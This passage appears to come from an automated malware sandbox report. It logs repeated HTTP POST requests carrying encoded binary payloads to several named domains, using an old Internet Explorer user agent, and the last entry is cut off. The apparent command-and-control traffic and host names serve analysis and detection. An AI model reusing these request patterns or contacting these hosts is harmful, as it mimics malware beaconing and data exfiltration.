6c 46 2f 35 54 70 75 5a 2f 57 4d 4a 46 75 7a 2f 6b 62 50 30 4b 51 68 48 51 6f 58 52 62 6b 30 59 48 30 45 47 38 76 35 54 49 75 70 38 39 45 36 79 37 50 4d 41 56 6c 47 47 64 53 6d 72 55 38 32 57 41 6b 38 69 4c 53 52 7a 4a 6a 33 71 62 33 49 35 78 72 75 45 73 41 4c 32 77 4c 61 76 67 45 7a 7a 2b 6f 64 6a 53 54 6f 57 41 43 46 49 76 75 61 46 71 6d 68 42 76 50 50 57 35 65 36 33 62 57 47 7a 71 43 61 78 5a 6c 50 53 71 48 73 63 50 44 78 65 4c 54 38 6c 49 63 53 43 45 45 59 59 31 73 6b 66 30 6d 37 34 58 53 71 76 63 70 6e 54 62 4e 69 30 70 49 4f 65 76 41 69 4f 39 48 48 74 4b 72 46 65 73 37 56 74 2f 35 50 6a 7a 66 75 4f 54 4c 33 32 51 44 43 2f 65 31 78 41 2b 6a 50 6b 2b 2b 6a 49 6b 55 6a 54 4d 65 58 48 2b 5a 30 47 6b 6e 64 6c 35 6e 2f 30 35 62 51 52 4a 53 6a 62 56 41 6e 52 55 71 73 43 73 39 67 77 43 4d 78 49 66 72 66 6e 4c 4e 61 4e 52 2b 48 42 2f 30 37 55 59 69 4b 61 61 78 4f 43 79 50 5a 66 71 79 48 69 4b 4c 62 48 78 69 49 2b 2b 55 56 45 6c 46 75 74 74 62 34 36 49 75 70 69 65 35 69 68 75 4b 70 69 73 72 5a 73 47 7a 41 67 72 34 75 30 4f 6d 6a 46 30 49 38 71 38 4e 52 63 66 54 6b 44 41 38 65 37 41 57 43 7a 6f 39 70 7a 33 74 68 63 3d Data Ascii: +vl3JpF5qtJznSg3MOWvuuqHQjxPCh7hVaHDX3/kmgXk07ixxky2b/ycUK5u4XexCUGlxAuTn2JUps05osPpyTUZhlq/20LCCPu0WbSOKLupSuPYT48+oMpeE6GFD6lh/o4p0twQWBLwT4ONZD8QybQNacgQQkWEflKFz85L60yAh7hKwCXlF/5TpuZ/WMJFuz/kbP0KQhHQoXRbk0YH0EG8v5TIup89E6y7PMAVlGGdSmrU82WAk8iLSRzJj3qb3I5xruEsAL2wLavgEzz+odjSToWACFIvuaFqmhBvPPW5e63bWGzqCaxZlPSqHscPDxeLT8lIcSCEEYY1skf0m74XSqvcpnTbNi0pIOevAiO9HHtKrFes7Vt/5PjzfuOTL32QDC/e1xA+jPk++jIkUjTMeXH+Z0Gkndl5n/05bQRJSjbVAnRUqsCs9gwCMxIfrfnLNaNR+HB/07UYiKaaxOCyPZfqyHiKLbHxiI++UVElFuttb46Iupie5ihuKpisrZsGzAgr4u0OmjF0I8q8NRcfTkDA8e7AWCzo9pz3thc=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 61 73 55 6f 6f 6d 62 64 6e 64 4a 4e 6e 44 4a 2f 41 64 57 66 63 34 6e 37 5a 36 56 47 70 32 70 75 2b 6d 64 67 70 48 45 42 38 36 38 73 63 41 79 73 74 56 68 6c 38 4c 4d 64 50 64 35 4d 62 68 50 59 4a 30 46 55 45 43 61 5a 65 67 37 4e 35 2b 64 48 4a 71 66 59 38 38 30 45 39 2b 38 4f 63 42 4b 59 6d 4c 41 44 33 31 66 4b 68 38 64 58 57 4a 54 36 65 77 78 55 72 31 48 75 36 61 72 48 6f 54 43 65 2f 4f 46 4f 58 4b 33 61 73 6f 34 61 79 53 66 73 6b 53 50 36 37 34 73 70 2b 30 32 6c 32 44 36 66 35 52 61 38 6b 52 45 44 37 61 61 38 5a 31 77 64 65 69 62 33 62 63 49 32 73 53 7a 6d 62 65 2f 35 75 38 4e 4c 4d 70 30 2b 4b 77 34 76 39 61 4e 75 4d 67 5a 6f 50 30 38 4d 36 63 56 62 2b 34 47 61 69 58 41 2b 39 5a 6e 74 4f 63 76 72 46 50 65 70 37 38 75 6b 6b 63 58 44 47 49 7a 2f 53 45 31 76 5a 33 57 4d 49 33 36 51 50 33 6b 46 66 45 38 39 71 4b 69 2f 68 69 33 62 75 47 59 52 75 70 51 4e 4d 59 70 49 32 47 6f 6f 66 78 38 38 2f 39 33 50 75 68 6e 66 4f 45 77 4a 6e 6e 70 41 44 77 49 4b 62 75 70 77 6e 71 6f 4e 64 39 32 7a 61 42 77 7a 52 6e 4b 4e 6e 75 6f 64 2f 57 55 69 79 71 72 51 2f 51 68 4b 63 4e 74 63 43 6e 2f 54 63 6f 43 48 37 48 59 51 46 63 73 76 37 36 78 48 61 2f 36 2b 33 4e 63 77 2f 49 45 6f 61 41 30 54 6c 4a 4c 41 54 6f 76 6c 61 68 68 62 57 66 30 50 69 45 74 58 79 72 49 73 54 5a 6c 43 41 46 61 74 46 4f 76 36 54 47 47 42 78 51 31 46 66 71 57 77 45 47 68 70 65 69 2b 45 2b 41 4a 51 46 6f 6e 34 77 51 57 63 62 57 6a 38 30 35 4d 4e 2b 78 4f 50 6b 4d 6b 57 79 43 59 54 74 74 41 69 69 78 53 61 68 6f 68 66 76 39 6b 55 32 53 78 6e 2f 54 51 6e 72 2f 53 32 70 75 4f 49 35 78 64 55 72 76 52 45 31 72 59 6e 79 59 32 2f 4e 71 6f 74 35 35 42 43 5a 6e 31 73 56 5a 4e 34 32 76 32 46 70 35 54 4c 66 2b 34 69 55 69 72 48 50 49 4d 4e 50 49 4f 32 2b 2f 57 57 62 45 56 6a 59 4a 76 68 44 73 36 39 Data Ascii: asUoombdndJNnDJ/AdWfc4n7Z6VGp2pu+mdgpHEB868scAystVhl8LMdPd5MbhPYJ0FUECaZeg7N5+dHJqfY880E9+8OcBKYmLAD31fKh8dXWJT6ewxUr1Hu6arHoTCe/OFOXK3aso4aySfskSP674sp+02l2D6f5Ra8kRED7aa8Z1wdeib3bcI2sSzmbe/5u8NLMp0+Kw4v9aNuMgZoP08M6cVb+4GaiXA+9ZntOcvrFPep78ukkcXDGIz/SE1vZ3WMI36QP3kFfE89qKi/hi3buGYRupQNMYpI2Goofx88/93PuhnfOEwJnnpADwIKbupwnqoNd92zaBwzRnKNnuod/WUiyqrQ/QhKcNtcCn/TcoCH7HYQFcsv76xHa/6+3Ncw/IEoaA0TlJLATovlahhbWf0PiEtXyrIsTZlCAFatFOv6TGGBxQ1FfqWwEGhpei+E+AJQFon4wQWcbWj805MN+xOPkMkWyCYTttAiixSahohfv9kU2Sxn/TQnr/S2puOI5xdUrvRE1rYnyY2/Nqot55BCZn1sVZN42v2Fp5TLf+4iUirHPIMNPIO2+/WWbEVjYJvhDs69
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 2b 76 6c 33 4a 70 46 35 71 74 4a 7a 6e 53 67 33 4d 4f 57 76 75 75 71 48 51 6a 78 50 43 68 37 68 56 61 48 44 58 33 2f 6b 6d 67 58 6b 30 37 69 78 78 6b 79 32 62 2f 79 63 55 4b 35 75 34 58 65 78 43 55 47 6c 78 41 75 54 6e 32 4a 55 70 73 30 35 6f 73 50 70 79 54 55 5a 68 6c 71 2f 32 30 4c 43 43 50 75 30 57 62 53 4f 4b 4c 75 70 53 75 50 59 54 34 38 2b 6f 4d 70 65 45 36 47 46 44 36 6c 68 2f 6f 34 70 30 74 77 51 57 42 4c 77 54 34 4f 4e 5a 44 38 51 79 62 51 4e 61 63 67 51 51 6b 57 45 66 6c 4b 46 7a 38 35 4c 36 30 79 41 68 37 68 4b 77 43 58 6c 46 2f 35 54 70 75 5a 2f 57 4d 4a 46 75 7a 2f 6b 62 50 30 4b 51 68 48 51 6f 58 52 62 6b 30 59 48 30 45 47 38 76 35 54 49 75 70 38 39 45 36 79 37 50 4d 41 56 6c 47 47 64 53 6d 72 55 38 32 57 41 6b 38 69 4c 53 52 7a 4a 6a 33 71 62 33 49 35 78 72 75 45 73 41 4c 32 77 4c 61 76 67 45 7a 7a 2b 6f 64 6a 53 54 6f 57 41 43 46 49 76 75 61 46 71 6d 68 42 76 50 50 57 35 65 36 33 62 57 47 7a 71 43 61 78 5a 6c 50 53 71 48 73 63 50 44 78 65 4c 54 38 6c 49 63 53 43 45 45 59 59 31 73 6b 66 30 6d 37 34 58 53 71 76 63 70 6e 54 62 4e 69 30 70 49 4f 65 76 41 69 4f 39 48 48 74 4b 72 46 65 73 37 56 74 2f 35 50 6a 7a 66 75 4f 54 4c 33 32 51 44 43 2f 65 31 78 41 2b 6a 50 6b 2b 2b 6a 49 6b 55 6a 54 4d 65 58 48 2b 5a 30 47 6b 6e 64 6c 35 6e 2f 30 35 62 51 52 4a 53 6a 62 56 41 6e 52 55 71 73 43 73 39 67 77 43 4d 78 49 66 72 66 6e 4c 4e 61 4e 52 2b 48 42 2f 30 37 55 59 69 4b 61 61 78 4f 43 79 50 5a 66 71 79 48 69 4b 4c 62 48 78 69 49 2b 2b 55 56 45 6c 46 75 74 74 62 34 36 49 75 70 69 65 35 69 68 75 4b 70 69 73 72 5a 73 47 7a 41 67 72 34 75 30 4f 6d 6a 46 30 49 38 71 38 4e 52 63 66 54 6b 44 41 38 65 37 41 57 43 7a 6f 39 70 7a 33 74 68 63 3d Data Ascii: +vl3JpF5qtJznSg3MOWvuuqHQjxPCh7hVaHDX3/kmgXk07ixxky2b/ycUK5u4XexCUGlxAuTn2JUps05osPpyTUZhlq/20LCCPu0WbSOKLupSuPYT48+oMpeE6GFD6lh/o4p0twQWBLwT4ONZD8QybQNacgQQkWEflKFz85L60yAh7hKwCXlF/5TpuZ/WMJFuz/kbP0KQhHQoXRbk0YH0EG8v5TIup89E6y7PMAVlGGdSmrU82WAk8iLSRzJj3qb3I5xruEsAL2wLavgEzz+odjSToWACFIvuaFqmhBvPPW5e63bWGzqCaxZlPSqHscPDxeLT8lIcSCEEYY1skf0m74XSqvcpnTbNi0pIOevAiO9HHtKrFes7Vt/5PjzfuOTL32QDC/e1xA+jPk++jIkUjTMeXH+Z0Gkndl5n/05bQRJSjbVAnRUqsCs9gwCMxIfrfnLNaNR+HB/07UYiKaaxOCyPZfqyHiKLbHxiI++UVElFuttb46Iupie5ihuKpisrZsGzAgr4u0OmjF0I8q8NRcfTkDA8e7AWCzo9pz3thc=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nqks.comCache-Control: no-cacheData Raw: 44 54 42 7a 6e 41 70 41 4e 5a 71 78 69 37 41 79 62 53 2b 68 69 63 30 46 71 78 2b 36 79 43 58 41 33 6a 71 6c 72 73 6c 78 4c 2f 42 31 6a 6e 35 67 51 77 62 68 4c 36 43 66 46 44 30 6a 62 76 55 52 5a 56 56 63 45 66 73 43 7a 73 79 30 4c 43 71 67 50 4f 61 49 63 31 35 72 53 6d 32 65 64 6e 32 69 56 6b 35 7a 35 63 76 30 77 78 31 63 62 33 64 63 33 53 30 70 62 35 43 53 42 2b 4a 73 67 34 71 58 75 36 66 66 41 63 4a 49 45 38 4f 76 62 2f 5a 5a 47 55 6a 36 2b 33 47 48 33 44 50 36 2b 6c 61 50 50 36 71 50 46 64 77 77 4d 4d 4d 4e 74 67 34 59 75 75 51 73 37 4d 65 47 73 64 74 5a 31 70 50 53 6b 38 77 47 68 55 39 4d 6e 44 6c 52 4e 6f 73 34 75 48 43 42 44 51 5a 61 44 79 6e 53 64 79 44 75 35 7a 2b 74 75 75 70 39 33 47 79 56 6a 36 4c 34 4f 66 4f 78 71 34 74 79 56 35 78 67 65 4a 57 49 56 42 39 56 7a 79 61 32 71 68 44 77 2f 6e 6d 61 50 4b 36 50 51 73 4e 38 74 59 6b 36 76 42 4a 65 4a 74 41 59 66 4c 4a 37 71 31 6f 45 42 31 63 45 4f 59 5a 6d 79 72 46 6b 4a 53 6c 43 6d 44 76 47 2f 4d 7a 5a 6d 44 5a 65 38 48 69 4d 65 47 74 65 38 32 59 44 49 47 6c 42 6d 52 72 68 31 79 48 77 6d 77 71 4f 57 6d 72 74 48 41 39 44 6a 51 41 77 53 48 72 44 4f 59 33 63 6c 70 62 68 76 31 42 70 5a 4b 73 77 48 6e 65 6b 71 7a 48 2b 43 62 64 43 48 77 38 59 6a 69 2b 47 5a 59 59 57 66 71 79 70 36 30 67 6e 67 6d 64 31 73 69 6e 73 32 70 70 44 69 65 5a 6b 78 6a 59 65 54 48 4d 74 6c 4f 4d 79 47 4d 6d 44 7a 33 61 31 35 44 79 72 49 75 78 70 76 4e 77 4f 64 69 39 63 74 69 52 36 2f 6e 66 38 4d 34 4c 4c 42 59 44 54 4f 5a 62 61 57 63 42 74 53 7a 2f 36 6a 6b 74 32 51 6c 33 64 63 4a 7a 46 35 50 66 39 2b 78 30 48 4b 34 51 5a 30 51 54 46 51 4c 57 58 36 69 36 59 6b 57 66 6f 7a 4b 63 6d 36 57 73 31 34 76 48 59 6a 6f 4c 56 4e 62 6f 49 37 2f 66 71 66 79 59 79 65 67 3d 3d Data Ascii: DTBznApANZqxi7AybS+hic0Fqx+6yCXA3jqlrslxL/B1jn5gQwbhL6CfFD0jbvURZVVcEfsCzsy0LCqgPOaIc15rSm2edn2iVk5z5cv0wx1cb3dc3S0pb5CSB+Jsg4qXu6ffAcJIE8Ovb/ZZGUj6+3GH3DP6+laPP6qPFdwwMMMNtg4YuuQs7MeGsdtZ1pPSk8wGhU9MnDlRNos4uHCBDQZaDynSdyDu5z+tuup93GyVj6L4OfOxq4tyV5xgeJWIVB9Vzya2qhDw/nmaPK6PQsN8tYk6vBJeJtAYfLJ7q1oEB1cEOYZmyrFkJSlCmDvG/MzZmDZe8HiMeGte82YDIGlBmRrh1yHwmwqOWmrtHA9DjQAwSHrDOY3clpbhv1BpZKswHnekqzH+CbdCHw8Yji+GZYYWfqyp60gngmd1sins2ppDieZkxjYeTHMtlOMyGMmDz3a15DyrIuxpvNwOdi9ctiR6/nf8M4LLBYDTOZbaWcBtSz/6jkt2Ql3dcJzF5Pf9+x0HK4QZ0QTFQLWX6i6YkWfozKcm6Ws14vHYjoLVNboI7/fqfyYyeg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 6f 6e 2b 62 59 69 6c 66 4d 35 71 2f 6f 52 43 6a 2b 42 37 32 30 30 4b 31 5a 41 6e 48 6d 78 75 39 62 5a 78 52 79 41 32 36 5a 75 65 74 34 77 65 6a 65 48 42 4c 66 33 72 6f 79 59 68 30 2f 50 6e 34 4e 6a 54 46 70 6c 6d 70 4e 54 7a 78 70 6f 77 6a 43 50 75 4a 77 2f 53 48 74 52 53 47 4b 75 5a 36 71 57 4b 47 48 50 47 5a 72 41 4a 6f 6b 73 53 67 4d 2b 72 44 50 77 61 58 58 2f 6f 65 42 67 62 4a 38 39 43 77 62 5a 30 30 4b 35 79 6a 4e 59 6a 58 37 4c 4d 35 33 57 52 4b 33 71 67 69 47 4b 79 32 77 4c 6d 38 63 55 4b 31 57 38 44 31 39 73 43 32 44 33 64 78 66 56 49 6f 74 33 35 79 4f 49 7a 54 63 67 5a 63 6f 31 69 72 6e 61 2f 62 6e 64 52 59 57 76 76 68 62 38 56 59 6a 6b 52 44 61 52 64 7a 5a 4b 6b 64 59 65 41 51 52 48 31 42 6d 30 45 4d 77 38 4a 63 66 6f 65 74 76 50 5a 7a 43 62 61 62 43 35 41 56 57 47 4c 42 4c 6e 6b 6c 57 4c 75 6d 74 66 76 6a 63 44 73 57 63 7a 61 79 39 68 62 46 4d 76 45 72 4f 37 6f 31 6f 4b 57 30 78 74 4d 79 61 42 6f 79 32 45 43 65 76 6e 77 50 63 79 45 66 4e 7a 63 6f 67 6a 4e 69 70 79 50 7a 50 4a 4f 38 45 45 4e 4c 73 46 62 78 61 54 6c 68 4a 6c 71 6d 53 58 41 32 79 6d 30 51 39 2f 30 43 69 68 30 6c 72 46 4d 68 70 6d 4c 6f 44 2f 4b 49 64 75 61 6c 6d 71 76 53 36 57 5a 74 68 76 63 66 71 48 31 48 6b 59 5a 45 69 58 6f 75 36 2f 69 64 5a 35 30 4d 44 57 50 52 72 72 38 4e 2b 31 77 2b 71 77 31 56 2b 41 30 33 64 38 57 35 64 49 4b 4c 6e 57 42 33 61 43 48 5a 6e 58 66 6e 59 4b 58 37 2f 6a 71 4e 46 35 32 31 53 55 71 37 6b 49 58 67 7a 64 6a 64 58 64 65 5a 5a 64 48 68 79 59 56 57 54 74 64 45 4b 6f 54 48 6b 43 4f 71 6f 47 2b 6a 45 65 33 4d 59 4f 78 71 43 32 6d 74 4c 4f 4a 79 6d 59 4e 4c 4d 41 78 67 70 4b 34 4d 45 6b 6b 76 66 6b 73 77 34 73 55 30 57 41 3d 3d Data Ascii: on+bYilfM5q/oRCj+B7200K1ZAnHmxu9bZxRyA26Zuet4wejeHBLf3royYh0/Pn4NjTFplmpNTzxpowjCPuJw/SHtRSGKuZ6qWKGHPGZrAJoksSgM+rDPwaXX/oeBgbJ89CwbZ00K5yjNYjX7LM53WRK3qgiGKy2wLm8cUK1W8D19sC2D3dxfVIot35yOIzTcgZco1irna/bndRYWvvhb8VYjkRDaRdzZKkdYeAQRH1Bm0EMw8JcfoetvPZzCbabC5AVWGLBLnklWLumtfvjcDsWczay9hbFMvErO7o1oKW0xtMyaBoy2ECevnwPcyEfNzcogjNipyPzPJO8EENLsFbxaTlhJlqmSXA2ym0Q9/0Cih0lrFMhpmLoD/KIdualmqvS6WZthvcfqH1HkYZEiXou6/idZ50MDWPRrr8N+1w+qw1V+A03d8W5dIKLnWB3aCHZnXfnYKX7/jqNF521SUq7kIXgzdjdXdeZZdHhyYVWTtdEKoTHkCOqoG+jEe3MYOxqC2mtLOJymYNLMAxgpK4MEkkvfksw4sU0WA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 37 67 49 32 59 59 31 54 4d 35 6f 4a 6d 43 66 6f 42 46 38 5a 72 55 62 2f 45 48 66 37 63 53 58 4a 45 55 55 55 78 56 4b 70 37 6f 77 49 7a 69 68 71 37 61 51 44 2b 34 6a 49 4f 72 64 6f 72 41 46 63 6d 6b 50 46 41 4b 69 72 63 52 4e 49 4f 4c 79 32 37 7a 55 56 34 66 67 68 36 76 52 6b 41 6c 46 41 30 56 2b 68 6a 43 7a 57 6f 2b 4a 51 43 56 67 4a 6d 70 2f 4b 67 4e 4d 70 79 58 74 47 78 59 43 46 32 66 33 6c 4a 30 47 76 63 48 4a 52 6a 4d 33 6f 77 78 71 63 62 49 75 57 47 4d 70 6b 55 6c 76 6d 6f 31 6b 51 56 57 61 57 30 63 66 55 73 30 2f 78 70 71 34 56 64 77 4c 61 4e 33 4c 65 75 79 43 58 30 2f 62 63 2f 55 57 2f 39 52 48 4e 6d 5a 4b 79 70 46 33 35 4e 47 64 67 59 75 32 75 2f 4b 45 67 42 34 4f 62 74 4e 57 65 4e 41 63 70 74 49 69 63 64 67 64 75 72 7a 50 73 41 78 6d 50 4c 75 53 77 2f 61 31 66 72 76 46 6d 37 72 58 74 4a 75 5a 45 48 75 64 48 47 73 38 62 73 69 44 6e 4d 2f 4e 39 4c 37 30 62 43 63 72 58 75 36 6f 59 31 6b 45 6a 6a 44 53 34 36 37 64 6c 52 32 70 67 70 4a 34 75 6f 41 59 48 73 4b 73 2b 77 31 43 7a 46 50 58 4a 67 33 77 4b 49 6d 59 79 68 45 69 44 6d 51 72 2b 7a 37 52 67 34 4a 52 70 75 34 36 55 77 74 56 64 6a 52 4c 52 66 7a 4d 76 43 55 4f 49 61 36 45 45 53 47 4a 6c 58 6a 67 36 49 33 38 50 4a 7a 4c 4a 38 41 35 72 4e 42 69 6b 71 78 2b 31 55 35 34 4d 32 6c 39 4d 70 34 47 53 33 43 63 33 70 61 74 42 63 78 36 31 31 6c 79 32 63 75 52 72 57 6e 4c 43 68 72 4f 39 37 49 76 58 67 6f 49 56 6c 37 30 6d 63 75 74 6c 36 38 47 57 5a 49 65 58 45 4f 5a 4a 58 6b 53 4f 50 32 78 66 39 2b 54 74 4c 58 56 42 7a 2f 74 35 47 2b 36 79 38 39 50 2f 45 64 42 2f 64 37 33 2b 78 30 33 70 72 78 78 33 69 66 79 74 2f 4e 2b 54 62 4e 68 69 71 39 52 6f 39 39 30 36 37 5a 72 70 6e 44 6f 64 4a 6d 36 51 63 75 6a 6e 39 6d 61 37 4c 65 74 4b 66 5a 41 78 36 72 6e 75 41 61 55 3d Data Ascii: 7gI2YY1TM5oJmCfoBF8ZrUb/EHf7cSXJEUUUxVKp7owIzihq7aQD+4jIOrdorAFcmkPFAKircRNIOLy27zUV4fgh6vRkAlFA0V+hjCzWo+JQCVgJmp/KgNMpyXtGxYCF2f3lJ0GvcHJRjM3owxqcbIuWGMpkUlvmo1kQVWaW0cfUs0/xpq4VdwLaN3LeuyCX0/bc/UW/9RHNmZKypF35NGdgYu2u/KEgB4ObtNWeNAcptIicdgdurzPsAxmPLuSw/a1frvFm7rXtJuZEHudHGs8bsiDnM/N9L70bCcrXu6oY1kEjjDS467dlR2pgpJ4uoAYHsKs+w1CzFPXJg3wKImYyhEiDmQr+z7Rg4JRpu46UwtVdjRLRfzMvCUOIa6EESGJlXjg6I38PJzLJ8A5rNBikqx+1U54M2l9Mp4GS3Cc3patBcx611ly2cuRrWnLChrO97IvXgoIVl70mcutl68GWZIeXEOZJXkSOP2xf9+TtLXVBz/t5G+6y89P/EdB/d73+x03prxx3ifyt/N+TbNhiq9Ro99067ZrpnDodJm6Qcujn9ma7LetKfZAx6rnuAaU=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 61 63 34 57 35 43 58 7a 4a 70 70 4e 41 59 2b 47 7a 41 72 6e 55 35 37 36 66 34 31 7a 68 59 53 77 4b 63 72 73 57 65 38 31 42 62 5a 74 5a 69 4f 6b 78 47 66 45 69 46 67 39 54 6e 52 72 39 2f 76 73 76 36 2f 73 65 6d 67 4d 6a 36 68 35 45 73 38 7a 38 56 77 64 52 38 35 77 55 39 37 6f 38 72 43 54 67 72 4c 77 42 53 74 42 51 51 55 32 38 58 57 6a 6c 2b 66 6b 42 4e 7a 6e 67 34 4a 76 2b 59 79 7a 78 48 63 37 76 41 7a 63 62 6f 62 72 33 6f 6d 37 6b 66 4b 6a 6f 32 32 42 42 68 34 73 6b 74 35 49 6e 31 66 66 39 69 31 73 67 70 57 32 42 2f 51 36 58 6a 76 64 63 73 6e 71 56 62 72 39 30 52 36 65 4f 75 45 57 35 71 6b 6e 4f 77 37 7a 51 73 35 58 31 65 57 44 7a 55 4c 67 6f 49 41 78 76 33 6a 58 2b 6e 5a 50 66 78 78 68 4b 63 49 41 61 31 67 54 52 56 79 43 51 59 46 52 75 54 62 6f 7a 68 74 57 51 4b 50 72 6f 54 52 7a 78 68 57 52 31 4a 65 63 2f 6e 32 57 74 6c 55 6c 46 67 45 79 6a 49 48 35 64 66 4b 47 2b 73 6b 4a 63 4d 64 50 41 34 37 4d 54 76 42 73 51 66 49 34 50 64 4a 43 58 71 56 39 78 41 36 41 4d 71 70 6d 2b 42 67 66 5a 4d 69 59 65 38 77 38 45 5a 4c 65 2f 70 58 30 4c 52 54 33 65 70 52 6a 5a 74 35 2f 56 63 2b 70 50 71 45 38 2f 64 56 63 68 46 79 6c 41 32 76 66 51 4f 63 58 69 61 63 63 7a 67 6d 35 76 5a 38 54 72 58 77 47 4d 41 37 77 6e 6e 35 59 4e 6a 76 48 48 57 55 4c 33 79 37 56 33 78 30 6c 46 50 41 67 6a 32 67 61 4d 59 33 34 50 66 61 43 38 43 35 74 31 46 63 30 30 36 32 73 79 41 57 77 4e 6f 67 58 6a 2b 7a 75 74 74 62 78 79 70 74 32 77 43 78 41 41 6e 57 50 78 32 47 74 48 4c 6e 54 49 55 67 39 59 72 67 54 72 68 49 39 48 62 32 71 33 69 4f 6e 62 6e 64 4b 4e 4a 38 2b 71 38 44 47 36 33 56 56 79 41 58 51 74 6e 6e 58 57 57 7a 37 37 73 79 4e 77 6b 61 72 Data Ascii: ac4W5CXzJppNAY+GzArnU576f41zhYSwKcrsWe81BbZtZiOkxGfEiFg9TnRr9/vsv6/semgMj6h5Es8z8VwdR85wU97o8rCTgrLwBStBQQU28XWjl+fkBNzng4Jv+YyzxHc7vAzcbobr3om7kfKjo22BBh4skt5In1ff9i1sgpW2B/Q6XjvdcsnqVbr90R6eOuEW5qknOw7zQs5X1eWDzULgoIAxv3jX+nZPfxxhKcIAa1gTRVyCQYFRuTbozhtWQKProTRzxhWR1Jec/n2WtlUlFgEyjIH5dfKG+skJcMdPA47MTvBsQfI4PdJCXqV9xA6AMqpm+BgfZMiYe8w8EZLe/pX0LRT3epRjZt5/Vc+pPqE8/dVchFylA2vfQOcXiacczgm5vZ8TrXwGMA7wnn5YNjvHHWUL3y7V3x0lFPAgj2gaMY34PfaC8C5t1Fc0062syAWwNogXj+zuttbxypt2wCxAAnWPx2GtHLnTIUg9YrgTrhI9Hb2q3iOnbndKNJ8+q8DG63VVyAXQtnnXWWz77syNwkar
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 31 7a 2b 34 31 57 70 73 50 35 6f 6e 4d 51 70 32 54 62 41 7a 37 53 33 52 56 43 4f 61 58 43 31 7a 50 73 58 54 4f 7a 50 4a 55 4e 4c 45 53 41 37 33 6d 2f 50 50 55 74 75 35 41 52 78 70 38 77 59 7a 73 4f 39 31 45 61 32 38 68 65 38 32 4a 4d 38 6c 79 55 53 68 4c 38 4e 34 50 2b 35 63 73 51 74 30 4a 37 52 6a 75 37 54 49 69 2b 57 37 36 61 66 2b 6c 6a 6a 37 49 58 50 43 53 4f 4a 50 55 49 6f 70 63 41 79 67 4b 4d 72 58 61 4f 78 30 61 73 6b 6f 4a 53 75 71 43 32 59 32 70 31 64 56 51 68 77 31 32 45 6c 78 62 32 76 4c 63 67 6d 67 2f 45 7a 75 68 6e 71 71 4a 61 73 64 42 4d 4a 76 56 65 72 56 36 37 4f 48 72 64 36 6e 4c 47 35 50 76 51 53 74 35 57 50 46 34 53 57 56 37 4c 6b 4a 5a 56 61 6a 6b 71 4e 66 72 72 4b 53 45 49 46 68 51 4c 65 41 46 36 74 66 36 43 4c 56 4d 64 6a 31 35 59 35 6b 72 65 66 67 56 48 32 76 76 66 6e 74 4c 42 35 63 69 50 37 35 7a 75 48 4b 4c 43 55 64 6e 42 55 71 7a 2b 36 55 71 58 34 53 74 65 32 4a 4a 35 51 66 51 66 61 73 53 62 42 34 6a 39 77 37 51 4a 59 65 47 73 51 66 46 2b 52 76 69 66 5a 32 74 78 6e 75 7a 4d 59 56 36 56 64 6b 57 6a 50 31 41 51 70 58 36 75 6b 42 7a 72 44 31 4a 50 4f 57 74 44 73 32 44 63 4a 6a 48 6a 48 6a 42 53 52 32 6f 6b 66 52 74 47 55 61 2b 62 41 6a 51 58 48 45 41 4d 30 35 48 42 51 6b 66 57 42 41 2b 6e 34 37 62 47 78 63 75 4d 4a 34 6f 42 58 73 58 79 66 7a 6e 4a 53 46 4b 75 57 64 4a 37 53 59 79 66 75 4c 54 48 50 4d 5a 59 32 4f 37 72 6b 49 63 30 68 39 79 32 31 6f 32 64 43 4e 59 5a 5a 6f 39 79 36 38 6e 56 6e 4e 79 2b 37 4f 55 54 38 71 4d 73 57 51 51 52 74 53 56 4b 39 68 43 6e 49 73 6a 6a 75 50 4b 68 64 4a 4e 4d 41 63 6a 37 45 55 71 78 7a 30 48 44 46 39 55 41 6c 34 4c 4b 52 79 76 6a 70 65 74 5a 6a 72 4d 71 6e 70 57 35 6a 52 35 58 76 70 4a 6b 4e 34 67 48 49 59 Data Ascii: 